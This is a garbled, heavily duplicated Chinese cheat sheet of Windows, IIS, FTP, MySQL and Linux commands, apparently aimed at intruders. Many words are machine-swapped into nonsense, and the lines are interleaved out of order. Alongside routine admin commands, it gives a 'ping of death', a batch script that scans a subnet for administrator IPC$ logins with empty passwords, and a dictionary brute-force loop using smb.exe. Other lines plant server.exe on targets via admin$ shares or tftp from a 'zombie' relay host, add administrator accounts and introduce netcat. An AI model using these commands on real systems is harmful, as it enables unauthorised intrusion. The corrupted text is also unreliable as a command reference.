    cacls 文件名 参数字展现示或改造文件访问调整列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换钦点用户的走访权限;/G 用户名:perm 赋予内定用户访问权限;Perm 能够是: N 无,安德拉 读取, W 写入, C 更换(写入),F 完全调控;例:cacls D:test.txt /D pub 设定d:test.txt拒绝pub用户访问。 

    cacls 文件名 参数展现或修改文件访问调控列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换钦赐用户的走访权限;/G 用户名:perm 赋予内定用户访问权限;Perm 能够是: N 无,RAV4 读取, W 写入, C 改换(写入),F 完全调整;例:cacls D:test.txt /D pub 设定d:test.txt拒绝pub用户访问。 

      net user 帐户名 查看帐户的属性

    cacls 文件名 查看文件的访问用户权限列表 

    cacls 文件名 查看文件的造访用户权限列表 

      net localgroup administrators 用户名 /add 把“用户”增添到管理员中使其颇具管理员权限

    REM 文本内容 在批管理公事中增加注脚 

    REM 文本内容 在批管理文件中增添证明 

      net start 查看开启了怎么服务

    netsh 查看或改变本地互联网配置意况

    netsh 查看或转移本地网络配置意况

      net start 服务名 开启服务;(如:net start telnet, net start schedule)

    #4 四:

    #4 四:

      net stop 服务名 甘休某服务

    IIS服务命令: 

    IIS服务命令: 

      net time 目的ip 查看对方时刻

    iisreset /reboot 重启win2kComputer(但有提醒系统将重启消息出现) 

    iisreset /reboot 重启win2kComputer(但有提示系统将重启消息出现) 

      net time 目的ip /set 设置本地计算机时间与“目的IP”主机的时间同步,加上参数/yes可收回确认音信

    iisreset /start或stop 启动(停止)所有Internet服务 

    iisreset /start或stop 启动(停止)所有Internet服务 

      net view 查看本地局域网内开启了怎么样分享

    iisreset /restart 结束然后重新启航全数Internet服务 

    iisreset /restart 结束然后重新启航全体Internet服务 

      net view ip 查看对方局域网内开启了哪些分享

    iisreset /status 展现全体Internet服务情状 

    iisreset /status 显示全部Internet服务处境 

      net config 呈现系统网络设置

    iisreset /enable或disable 在当地系统上启用(禁止使用)Internet服务的双重开动 

    iisreset /enable或disable 在位置系统上启用(禁止使用)Internet服务的重复起动 

      net logoff 断开连接的共享

    iisreset /rebootonerror 当运营、截至或重新开动Internet服务时,若发生错误将另行开机 

    iisreset /rebootonerror 当运转、截至或重新起动Internet服务时,若产生错误将再也开机 

      net pause 服务名 暂停某服务

    iisreset /noforce 若无法甘休Internet服务,将不会强制结束Internet服务 

    iisreset /noforce 若无法结束Internet服务,将不会强制停止Internet服务 

      net send ip "文本音信" 向对方发新闻

    iisreset /timeout Val在达到逾时间(秒)时,仍未结束Internet服务,若钦赐/rebootonerror参数,则计算机将会再次开机。预设值为重新起动20秒,甘休60秒,重新开机0秒。 

    iisreset /timeout Val在达到逾时间(秒)时,仍未甘休Internet服务,若钦命/rebootonerror参数,则计算机将会再一次开机。预设值为重复启航20秒,结束60秒,重新开机0秒。 

      net ver 局域网内正在使用的互联网连接类型和音讯

    FTP 命令: (后边有详细表明内容) 

    FTP 命令: (后边有详细表明内容) 

      net share 查看本地开启的分享

    ftp的授命行格式为:

    ftp的一声令下行格式为:

      net share ipc$ 开启ipc$共享

    ftp -v -d -i -n -g[主机名] -v 展现远程服务器的有所响应音讯。

    ftp -v -d -i -n -g[主机名] -v 呈现远程服务器的兼具响应音信。

      net share ipc$ /del 删除ipc$共享

    -d 使用调节和测验格局。 

    -d 使用调节和测验方式。 

      net share c$ /del 删除C:共享

    -n 限制ftp的机动登陆,即不使用.netrc文件。

    -n 限制ftp的活动登入,即不使用.netrc文件。

      net user guest 12345 用guest用户登录后用将密码改为12345

    -g 撤废全局文件名。 

    -g 裁撤全局文件名。 

      net password 密码 改动系统登录密码

    help [命令] 或 ?[命令] 查看命令表明 

    help [命令] 或 ?[命令] 查看命令表达 

      netstat -a 查看开启了怎么样端口,常用netstat -an

    bye 或 quit 终止主机FTP进程,并脱离FTP处理方式. 

    bye 或 quit 终止主机FTP进程,并退出FTP管理形式. 

      netstat -n 查看端口的网络连接意况,常用netstat -an

    pwd 列出当下远端主机目录 

    pwd 列出方今远端主机目录 

      netstat -v 查看正在张开的办事

    put 或 send 当三步跳件名 [上传到主机上的文书名] 将当地一个文书传送至远端主机中 

    put 或 send 当半夏件名 [上传到主机上的文本名] 将本地一个文件传送至远端主机中 

      netstat -p 协议名 例:netstat -p tcq/ip 查看某协商使用情形

    get 或 recv [长距离主机文件名] [下载到地面后的文件名] 从远端主机中传送至地面主机中 

    get 或 recv [远程主机文件名] [下载到本地后的公文名] 从远端主机中传送至当地主机中 

      netstat -s 查看正在利用的享有协议利用状态

    mget [remote-files] 从远端主机接收一群众文化艺术件至地面主机 

    mget [remote-files] 从远端主机接收一堆文件至地点主机 

      nbtstat -A ip 对方136到139里边二个端口开了的话,就可查阅对方近些日子登录的用户名

    mput local-files 将本地主机中一群众文化艺术件传送至远端主机 

    mput local-files 将当地主机中一堆文件传送至远端主机 

      tracert -参数 ip(或计算机名) 追踪路由(数据包),参数:“-w数字”用于安装超时间隔。

    dir 或 ls [remote-directory] [local-file] 列出脚下远端主机目录中的文件.假诺有当三步跳件,就将结果写至地方文件 

    dir 或 ls [remote-directory] [local-file] 列出近来远端主机目录中的文件.假使有当和姑件,就将结果写至地面文件 

      ping ip(或域名) 向对方主机发送暗中认可大小为32字节的多少,参数:“-l[空格]多少包大小”;“-n发送数据次数”;“-t”指间接ping。

    ascii 设定以ASCII格局传送文件(缺省值) 

    ascii 设定以ASCII情势传递文件(缺省值) 

      ping -t -l 65550 ip 去世之ping(发送超越64K的文件并直接ping就成了已逝去之ping)

    bin 或 image 设定以二进制格局传送值) 

    bin 或 image 设定以二进制方式传送值) 

      ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”突显任何安插新闻

    bin 或 image 设定以二进制方式传递文件 

    bin 或 image 设定以二进制方式传送文件 

      tlist -t 以树行列表突显进程(为系统的附加工具,暗许是绝非设置的,在装置目录的Support/tools文件夹内)

    bell 每成功二次文件传送,报告警察方提醒 

    bell 每完成一次文件传送,报告警方提醒 

      kill -F 进度名 加-F参数后强制甘休某进程(为系统的附加工具,暗中同意是从未设置的,在装置目录的Support/tools文件夹内)

    cdup 重临上一级目录 

    cdup 重回上一级目录 

      del -F 文件名 加-F参数后就可去除只读文件,/A巴博斯 SLS级、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-Odyssey、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文书。举个例子“DEL/A昂Cora *.*”表示删除当前目录下具有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的兼具文件

    close 中断与长途服务器的ftp会话(与open对应) 

    close 中断与远程服务器的ftp会话(与open对应) 

      del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的全体子目录和文书。同不正常候接纳参数/Q 可打消删除操作时的种类确认就一贯删除。(二个指令功用同样)

    open host[port] 构建钦命ftp服务器连接,可钦赐连接端口 

    open host[port] 建构钦赐ftp服务器连接,可钦命连接端口 

      move 盘符路线要活动的文书名 存放移动文件的路子移动后文件名 移动文件,用参数/y将注销确认移动目录存在同样文件的升迁就直接覆盖

    delete 删除远端主机中的文件 

    delete 删除远端主机中的文件 

      fc one.txt two.txt > 3st.txt 相比较三个公文并把分歧之处输出到3st.txt文件中,"> "和"> >" 是重定向命令

    mdelete [remote-files] 删除一群众文化艺术件 

    mdelete [remote-files] 删除一群众文化艺术件 

      at id号 开启已登记的某部安插职分

    mkdir directory-name 在远端主机中确立目录 

    mkdir directory-name 在远端主机中创建目录 

      at /delete 停止全部安顿任务,用参数/yes则没有须求认同就径直停止

    rename [from] [to] 改换远端主机中的文件名 

    rename [from] [to] 改动远端主机中的文件名 

      at id号 /delete 停止有些已注册的安顿职务

    rmdir directory-name 删除远端主机中的目录 

    rmdir directory-name 删除远端主机中的目录 

      at 查看全数的安排职分

    status 展现当前FTP的事态 

    status 显示当前FTP的状态 

      at ip time 程序名(或叁个发令) /r 在某时间运作对方某先后玉石俱焚新起动计算机

    system 展现远端主机系统项目 

    system 展现远端主机系统项目 

      finger username @host 查看近些日子有怎么样用户登入

    user user-name [password] [account] 重新以其他用户名登陆远端主机 

    user user-name [password] [account] 重新以别的用户名登入远端主机 

      telnet ip 端口 远和登入服务器,私下认可端口为23

    open host [port] 重新树立贰个新的连接 

    open host [port] 重新建设构造二个新的连接 

      open ip 连接到IP(属telnet登录后的通令)

    prompt 交互提醒方式 

    prompt 交互提醒形式 

      telnet 在本机上直接键入telnet 将进入本机的telnet

    macdef 定义宏命令 

    macdef 定义宏命令 

      copy 路线文件名1 路线文件名2 /y 复制文件1到内定的目录为文件2,用参数/y就同一时间撤除确认你要改写一份现成目录文件

    lcd 更改前段时间地面主机的办事目录,假如缺省,就转到当前用户的HOME目录 

    lcd 改造近年来地面主机的做事目录,如若缺省,就转到当前用户的HOME目录 

      copy c:srv.exe ipadmin$ 复制当地c:srv.exe到对方的admin下

    chmod 更改远端主机的文书权限 

    chmod 退换远端主机的公文权限 

      copy 1st.jpg/b 2st.txt/a 3st.jpg 将2st.txt的剧情藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文本头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

    case 当为ON时,用MGET命令拷贝的文书名到地点机械中,全体转换为小写字母 

    case 当为ON时,用MGET命令拷贝的文书名到地点机械中,全体转变为小写字母 

      copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$分享下的srv.exe文件(全数文件)至地方C:

    cd remote-dir 进入远程主机目录 

    cd remote-dir 进入远程主机目录 

      xcopy 要复制的文书或目录树 目的地址目录名 复制文件和目录树,用参数/Y将不提示覆盖同样文件

    cdup 进入远程主机目录的父目录 

    cdup 进入远程主机目录的父目录 

      用参数/e才可连目录下的子目录一齐复制到指标地方下。

    ! 在该地机中实行交互shell,exit回到ftp遭逢,如!ls*.zip 

    ! 在地头机中实行交互shell,exit回到ftp际遇,如!ls*.zip 

      tftp -i 自身IP(用肉机作跳板时那用肉机IP) get server.exe c:server.exe 登录后,将“IP”的server.exe下载到目的主机c:server.exe 参数:-i指以二进制情势传送,如传送exe文件时用,如不加-i 则以ASCII格局(传送文件文件形式)举行传递

    MYSQL 命令: 

    MYSQL 命令: 

      tftp -i 对方IP put c:server.exe 登入后,上传本地c:server.exe至主机

    mysql -h主机地址 -u用户名 -p密码 连接MYSQL;若是刚安装好MYSQL,一级用户root是尚未密码的。

    mysql -h主机地址 -u用户名 -p密码 连接MYSQL;假使刚安装好MYSQL,一流用户root是未曾密码的。

      ftp ip 端口 用于上传文件至服务器或开展文件操作,私下认可端口为21。bin指用二进制情势传递(可执行文件进);默感到ASCII格式传送(文本文件时)

    (例:mysql -h110.110.110.110 -Uroot -P123456 

    (例:mysql -h110.110.110.110 -Uroot -P123456 

      route print 呈现出IP路由,将第一浮现网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

    注:u与root可以绝不加空格,此外也完全一样) 

    注:u与root能够毫不加空格,别的也一律) 

      arp 查看和拍卖ARP缓存,ARP是名字分析的乐趣,担负把四个IP分析成四个物理性的MAC地址。arp -a将显示出全体消息

    exit 退出MYSQL 

    exit 退出MYSQL 

      start 程序名或指令 /max 或/min 新开二个新窗口并最大化(最小化)运转某先后或指令

    mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 

    mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 

      mem 查看cpu使用情状

    grant select on 数据库.* to 用户名@登陆主机 identified by "密码"; 扩展新用户。(注意:和上边区别,上边包车型客车因为是MYSQL遭遇中的命令,所未来边都带一个支行作为命令甘休符) 

    grant select on 数据库.* to 用户名@登陆主机 identified by "密码"; 扩大新用户。(注意:和方面分裂,上面包车型客车因为是MYSQL景况中的命令,所今后面都带三个分行作为命令甘休符) 

      attrib 文件名(目录名) 查看某文件(目录)的属性

    show databases; 显示数据库列表。刚初叶时才多少个数据库:mysql和test。mysql库很入眼它里面有MYSQL的体系信息,大家改密码和新添用户,实际上即使用那几个库开始展览操作。 

    show databases; 呈现数据库列表。刚伊始时才多个数据库:mysql和test。mysql库很要紧它里面有MYSQL的种类音讯,大家改密码和新添用户,实际上即使用那几个库开始展览操作。 

      attrib 文件名 -A -奇骏 -S -H 或 A Rubicon S H 去掉(增加)某文件的 存档,只读,系统,隐藏 属性;用 则是拉长为某属性

    use mysql;

    use mysql;

      dir 查看文件,参数:/Q呈现文件及目录属系统哪个用户,/T:C显示文件创立时间,/T:A显示文件上次被访问时间,/T:W上次被涂改时间

    show tables; 呈现库中的数据表 

    show tables; 展现库中的数据表 

      date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只体现当今天子和岁月,而毋庸输入新日期和时间

    describe 表名; 展现数据表的布局 

    describe 表名; 展现数据表的构造 

      set 钦定遭遇变量名称=要指派给变量的字符 设置情形变量

    create database 库名; 建库 

    create database 库名; 建库 

      set 展现当前颇具的情状变量

    use 库名;

    use 库名;

      set p(或别的字符) 显示出当下以字符p(或任何字符)开端的全部情况变量

    create table 表名 (字段设定列表); 建表 

    create table 表名 (字段设定列表); 建表 

      pause 暂停批管理程序,并呈现出:请按放肆键继续....

    drop database 库名; 

    drop database 库名; 

      if 在批管理程序中实践基准管理(越多表明见if命令及变量)

    drop table 表名; 删库和删表 

    drop table 表名; 删库和删表 

      goto 标签 将cmd.exe导向到批管理程序中带标签的行(标签必须独立一行,且以冒号打头,举例:“:start”标签)

    delete from 表名; 将表中著录清空 

    delete from 表名; 将表中著录清空 

      call 路径批处理文件名 从批管理程序中调用另贰个批管理程序 (越来越多表明见call /?)

    select * from 表名; 展现表中的记录 

    select * from 表名; 显示表中的记录 

      for 对一组文件中的每七个文件进行某些特定命令(越多表达见for命令及变量)

    mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\mysql\bin目录下施行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文件文件,文件名任取,打开看看您会有新意识。 

    mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\mysql\bin目录下推行);注释:将数据库school备份到school.bbb文件,school.bbb是三个文件文件,文件名任取,展开看看您会有新意识。 

      echo on或off 张开或关闭echo,仅用echo不加参数则显妥当前echo设置

    win2002类别下新添命令(实用部份): 

    win二零零一种类下新增加命令(实用部份): 

      echo 消息 在荧屏上显得出音信

    shutdown /参数 关闭或重启本地或远程主机。

    shutdown /参数 关闭或重启本地或远程主机。

      echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中

    参数说明:/S 关闭主机,/LAND 重启主机, /T 数字 设定延时的日子,范围0~180秒之内, /A撤废开机,/M //IP 内定的长途主机。

    参数表明:/S 关闭主机,/Evoque 重启主机, /T 数字 设定延时的岁月,范围0~180秒之内, /A撤消开机,/M //IP 钦定的长距离主机。

      findstr "Hello" aa.txt 在aa.txt文件中搜索字符串hello

    例:shutdown /r /t 0 立刻重启本地主机(无延时) 

    例:shutdown /r /t 0 马上重启本地主机(无延时) 

      find 文件名 查找某文件

    taskill /参数 进度名或进度的pid 终止三个或多少个任务和进度。

    taskill /参数 进程名或进程的pid 终止一个或七个任务和进度。

      title 题目名字 改变CMD窗口标题名字

    参数表达:/PID 要停下进度的pid,可用tasklist命令获得各进度的pid,/IM 要甘休的进度的进度名,/F 强制截至进度,/T 终止钦点的历程及她所运转的子进程。 

    参数表达:/PID 要适可而止进度的pid,可用tasklist命令获得各进度的pid,/IM 要停下的长河的长河名,/F 强制截止进度,/T 终止钦赐的进程及她所运转的子进程。 

      color 颜色值 设置cmd调整台前景和背景颜色;0=黑、1=蓝、2=绿、3=黑灰、4=红、5=紫、6=黄、7=白、8=灰、9=葱白、A=浅紫蓝、B=淡蟹灰、C=浅莲灰、D=墨紫、E=荧光色、F=亮白

    tasklist 呈现当前运维在本地和长途主机上的长河、服务、服务各进程的长河标记符(PID)。

    tasklist 突显当前运作在地面和长途主机上的长河、服务、服务各进度的进程标记符(PID)。

      prompt 名称 改动cmd.exe的来得的通令提醒符(把C:、D:统一改为:EntSky )

    参数表明:/M 列出当前历程加载的dll文件,/SVC 显示出各种进程对应的劳务,无参数时就只列出近年来的进程。

    参数表明:/M 列出当前进度加载的dll文件,/SVC 突显出每一个进度对应的劳务,无参数时就只列出近日的进度。

      ver 在DOS窗口下显得版本音信

    #6 六:

    #6 六:

      winver 弹出三个窗口浮现版本新闻(内部存款和储蓄器大小、系统版本、补丁版本、Computer名)

    Linux系统下主题命令: 要区分轻重缓急写 

    Linux系统下主题命令: 要有别于轻重缓急写 

      format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS

    uname 显示版本音讯(同win2K的 ver) 

    uname 彰显版本新闻(同win2K的 ver) 

      md 目录名 创制目录

    dir 呈现当前目录文件,ls -al 突显包涵隐藏文件(同win2K的 dir) 

    dir 显示当前目录文件,ls -al 呈现包罗隐形文件(同win2K的 dir) 

      replace 源文件 要替换文件的目录 替换文件

    pwd 查询当前所在的目录地方 

    pwd 查询当前所在的目录地点 

      ren 原著件名 新文件名 重命名文件名

    cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /再次来到到根目录。 

    cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /再次回到到根目录。 

      tree 以树形结构展现出目录,用参数-f 将列出第个文本夹中文件名称

    cat 文件名 查看文件内容 

    cat 文件名 查看文件内容 

      type 文件名 展现文本文件的内容

    cat >abc.txt 往abc.txt文件中写上内容。 

    cat >abc.txt 往abc.txt文件中写上内容。 

      more 文件名 逐屏彰显输出文件

    more 文件名 以一页一页的章程体现三个文本文件。 

    more 文件名 以一页一页的情势显示四个文本文件。 

      doskey 要锁定的一声令下=字符

    cp 复制文件 

    cp 复制文件 

      doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创制宏)。如:锁定dir命令:doskey dir=entsky (不可能用doskey dir=dir);解锁:doskey dir=

    mv 移动文件 

    mv 移动文件 

      taskmgr 调出职务管理器

    rm 文件名 删除文件,rm -a 目录名删除目录及子目录 

    rm 文件名 删除文件,rm -a 目录名删除目录及子目录 

      chkdsk /F D: 检查磁盘D并展现状态报告;加参数/f并修复磁盘上的失实

    mkdir 目录名 建构目录 

    mkdir 目录名 建构目录 

      tlntadmn telnt服务admn,键入tlntadmn选择3,再选拔8,就能够更动telnet服务默许端口23为其余任何端口

    rmdir 删除子目录,目录内没有文书档案。 

    rmdir 删除子目录,目录内未有文书档案。 

      exit 退出cmd.exe程序或最近,用参数/B则是退出当前批管理脚本而不是cmd.exe

    chmod 设定档案或目录的存取权限 

    chmod 设定档案或目录的存取权限 

      path 路线可试行文件的文件名 为可实行文件设置一个门路。

    grep 在档案中搜寻字符串 

    grep 在档案中查找字符串 

      cmd 运转三个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩大;更小编详细表达见cmd /?

    diff 档案文件相比 

    diff 档案文件相比 

      regedit /s 注册表文件名导入注册表;参数/S指安静格局导入,无其余提醒;

    find 档案搜寻 

    find 档案搜寻 

      regedit /e 注册表文件名 导出注册表

    date 现在的日期、时间 

    date 以往的日期、时间 

      cacls 文件名 参数显示或改动文件访问调整列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换钦点用户的拜会权限;/G 用户名:perm 赋予钦命用户访问权限;Perm 能够是: N 无,Odyssey 读取, W 写入, C 改动(写入),F 完全调整;例:cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。

    who 查询如今和您选取同样台机器的人以及Login时间地点 

    who 查询近年来和您使用一样台机械的人以及Login时间地方 

      cacls 文件名 查看文件的拜会用户权限列表

    w 查询前段时间上机者的详细资料 

    w 查询最近上机者的详细资料 

      REM 文本内容 在批管理公事中增多声明

    whoami 查看本身的帐号名称 

    whoami 查看自身的帐号名称 

      netsh 查看或更改本地网络配置景况

    groups 查看有些人的Group 

    groups 查看某一个人的Group 

      IIS服务命令

    passwd 更换密码 

    passwd 更动密码 

      iisreset /reboot 重启win2kComputer(但有提醒系统将重启音讯出现)

    history 查看本身下过的命令 

    history 查看本身下过的命令 

      iisreset /start或stop 启动(停止)所有Internet服务

    ps 展现过程情状 

    ps 展现进程情形 

      iisreset /restart 结束然后再一次开动全数Internet服务

    kill 甘休某进程 

    kill 结束某进程 

      iisreset /status 展现全数Internet服务意况

    gcc 骇客平日用它来编写翻译C语言写的公文 

    gcc 黑客平日用它来编写翻译C语言写的文书 

      iisreset /enable或disable 在地头系统上启用(禁止使用)Internet服务的重复开动

    su 权限转换为钦赐使用者 

    su 权限调换为钦点使用者 

      iisreset /rebootonerror 当运维、结束或再一次起动Internet服务时,若产生错误将再一次开机

    telnet IP telnet连接对方主机(同win2K),当出现bash$时就注脚连接成功。 

    telnet IP telnet连接对方主机(同win2K),当现身bash$时就认证连接成功。 

      iisreset /noforce 若无法结束Internet服务,将不会强制结束Internet服务

    ftp ftp连接上某服务器(同win2K) 

    ftp ftp连接上某服务器(同win2K) 

      iisreset /timeout Val在到达逾时间(秒)时,仍未甘休Internet服务,若钦定/rebootonerror参数,则Computer将会重新开机。预设值为再一次开动20秒,截止60秒,重新开机0秒。

    附:批管理命令与变量

    附:批管理命令与变量

      FTP 命令: (后边有详实表达内容)

    1:for命令及变量 基本格式: 

    1:for命令及变量 基本格式: 

      ftp的指令行格式为:

    FOR /参数 %variable IN (set) DO command [command_parameters] %variable:钦定五个单一字母可替换的参数,如:%i ,而钦赐三个变量则用:%%i ,而调用变量时用:%i% ,变量是分别轻重缓急写的(%i 不对等 %I)。

    FOR /参数 %variable IN (set) DO command [command_parameters] %variable:钦点一个十足字母可替换的参数,如:%i ,而钦赐八个变量则用:%%i ,而调用变量时用:%i% ,变量是分别轻重缓急写的(%i 不对等 %I)。

      ftp -v -d -i -n -g[主机名] -v 展现远程服务器的装有响应音讯。

    批管理每便能管理的变量从%0—%9共拾三个,其中%0暗中认可给批管理文件名使用,%1默以为接纳此批管理时输入的的第三个值,同理:%2—%9指输入的第2-9个值;例:net use \ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

    批管理每趟能管理的变量从%0—%9共十二个,其中%0暗许给批管理公事名使用,%1默以为采取此批管理时输入的的第贰个值,同理:%2—%9指输入的第2-9个值;例:net use \ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

      -d 使用调节和测验格局。

    (set):钦定三个或一组文件,可利用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第七个"1"指早先值,首个"1"指增加量,第两个"254"指终结值,即:从1到254;"(1 -1 254)"表达:即从254到1 }

    (set):钦命二个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第贰个"1"指初叶值,第三个"1"指拉长量,第三个"254"指终结值,即:从1到254;"(1 -1 254)"表达:即从254到1 }

      -n 限制ftp的电动登陆,即不使用.netrc文件。

    command:钦命对第个文本推行的命令,如:net use命令;如要实施八个指令时,命令那间加:& 来隔断

    command:钦赐对第个文书实践的一声令下,如:net use命令;如要推行四个指令时,命令那间加:& 来隔开分离

      -g 撤除全局文件名。

    command_parameters:为一定命令钦命参数或命令行开关

    command_parameters:为特定命令钦命参数或命令行开关

      help [命令] 或 ?[命令] 查看命令表明

    IN (set):指在(set)中取值;DO command :指执行command

    IN (set):指在(set)中取值;DO command :指执行command

      bye 或 quit 终止主机FTP进程,并退出FTP管理格局.

    参数:/L 指用增量情势{ (set)为增量方式时 };/F 指从文件中频频取值,直到取完截至{ (set)为文件时,如(d:pass.txt)时 }。 

    参数:/L 指用增量情势{ (set)为增量方式时 };/F 指从文件中穿梭取值,直到取完甘休{ (set)为文件时,如(d:pass.txt)时 }。 

      pwd 列出脚下远端主机目录

    用法举个例子: 

    用法举个例子: 

      put 或 send 当半夏件名 [上传到主机上的公文名] 将本地叁个文件传送至远端主机中

    @echo off 

    @echo off 

      get 或 recv [长距离主机文件名] [下载到地面后的文书名] 从远端主机中传送至本土主机中

    echo 用法格式:test.bat *.*.* > test.txt 

    echo 用法格式:test.bat *.*.* > test.txt 

      mget [remote-files] 从远端主机接收一堆文件至地点主机

    for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功做到" >>test.txt 

    for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功实现" >>test.txt 

      mput local-files 将地方主机中一堆文件传送至远端主机

    存为test.bat 表达:对点名的三个C类网段的255个IP依次试构造建设administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。

    存为test.bat 表明:对点名的三个C类网段的252个IP依次试建设构造administrator密码为空的IPC$连接,假使成功就把该IP存在test.txt中。

      dir 或 ls [remote-directory] [local-file] 列出目前远端主机目录中的文件.假使有本土文件,就将结果写至地面文件

    /L指用增量情势(即从1-254或254-1);输入的IP前边三个人:*.*.*为批管理暗许的 %1;%%G 为变量(ip的末尾一个人);& 用来隔开分离echo 和net use 那二个指令;| 指建设构造了ipc$后,在结果中用find查看是或不是有"命令成功做到"新闻;%1.%%G 为完整的IP地址;(1 1 254) 指起初值,增进量,结止值。 

    /L指用增量格局(即从1-254或254-1);输入的IP前边二个人:*.*.*为批管理默许的 %1;%%G 为变量(ip的末段壹位);& 用来隔断echo 和net use 那个指令;| 指创建了ipc$后,在结果中用find查看是不是有"命令成功实现"音讯;%1.%%G 为总体的IP地址;(1 1 254) 指开首值,拉长量,结止值。 

      ascii 设定以ASCII方式传送文件(缺省值)

    @echo off 

    @echo off 

      bin 或 image 设定以二进制格局传递文件

    echo 用法格式:ok.bat ip 

    echo 用法格式:ok.bat ip 

      bell 每完结贰遍文件传送,报告警察方提醒

    FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200 

    FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200 

      cdup 重回上一流目录

    存为:ok.exe 表达:输入三个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完截至。%%i为用户名;%1为输入的IP地址(暗中同意)。 

    存为:ok.exe 表达:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完停止。%%i为用户名;%1为输入的IP地址(私下认可)。 

      close 中断与远程服务器的ftp会话(与open对应)

    2:if命令及变量 基本格式: 

    2:if命令及变量 基本格式: 

      open host[port] 创设钦点ftp服务器连接,可内定连接端口

    IF [not] errorlevel 数字 命令语句 假若程序运转最后回到一个特别或当先内定数字的脱离编码,钦命条件为"真"。

    IF [not] errorlevel 数字 命令语句 要是程序运行最终回到三个对等或高于内定数字的淡出编码,钦赐条件为"真"。

      delete 删除远端主机中的文件

    例:IF errorlevel 0 命令 指程序实行后再次回到的值为0时,就值行后边的下令;IF not errorlevel 1 命令指程序实施最终回来的值不对等1,就实施前边的指令。

    例:IF errorlevel 0 命令 指程序推行后归来的值为0时,就值行后边的下令;IF not errorlevel 1 命令指程序实施最终回来的值不等于1,就实施后边的命令。

      mdelete [remote-files] 删除一群众文化艺术件

    0 指开掘并打响推行(真);1 指未有意识、没实践(假)。 

    0 指开采并打响实践(真);1 指未有察觉、没推行(假)。 

      mkdir directory-name 在远端主机中树立目录

    IF [not] 字符串1==字符串2 发令语句 假如钦赐的文本字符串相称(即:字符串1 相当于 字符串2),就施行后边的吩咐。

    IF [not] 字符串1==字符串2 发令语句 假若钦赐的文本字符串匹配(即:字符串1 优良 字符串2),就进行前边的通令。

      rename [from] [to] 退换远端主机中的文件名

    例:"if "%2%"=="4" goto start"指:借使输入的第1个变量为4时,施行后边的授命(注意:调用变量时就%变量名%并加" ") 

    例:"if "%2%"=="4" goto start"指:要是输入的第二个变量为4时,实行前面包车型客车授命(注意:调用变量时就%变量名%并加" ") 

      rmdir directory-name 删除远端主机中的目录

    IF [not] exist 文件名 命令语句 假如钦点的文书名存在,就实施前面包车型地铁授命。

    IF [not] exist 文件名 命令语句 假若钦命的文书名存在,就实践前边的下令。

      status 显示当前FTP的动静

    例:"if not nc.exe goto end"指:如果未有意识nc.exe文件就跳到":end"标签处。

    例:"if not nc.exe goto end"指:若无意识nc.exe文件就跳到":end"标签处。

      system 展现远端主机系统项目

     

    IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当后边的典型不树立即,就指行else前边的指令。注意:else 必须与 if 在同等行才有效。

      user user-name [password] [account] 重新以别的用户名登陆远端主机

    IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 下令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前边的条件不成马上,就指行else前面的指令。注意:else 必须与 if 在长久以来行才有效。

    当有del命令时需把del命令全体内容用< >括起来,因为del命令要独立一行时技术施行,用上< >后就等于是单身一行了;比方:"if exist test.txt. else echo test.txt.missing ",注意命令中的"."

      open host [port] 重新确立二个新的连接

    当有del命令时需把del命令全部内容用< >括起来,因为del命令要独立一行时本事奉行,用上< >后就十分是独立一行了;比方:"if exist test.txt. else echo test.txt.missing ",注意命令中的"."

    (二)系统外部命令(均需下载相关工具):

      prompt 交互提醒方式

     

    1、瑞士联邦军刀:nc.exe

      macdef 定义宏命令

    (二)系统外界命令(均需下载相关工具):

    参数表明: 

      lcd 改动方今地点主机的干活目录,若是缺省,就转到当前用户的HOME目录

    1、瑞士联邦军刀:nc.exe

    -h 查看帮忙音信 

      chmod 改动远端主机的文本权限

    参数表明: 

    -d 后台方式 

      case 当为ON时,用MGET命令拷贝的文书名到位置机械中,全体转换为小写字母

    -h 查看支持音讯 

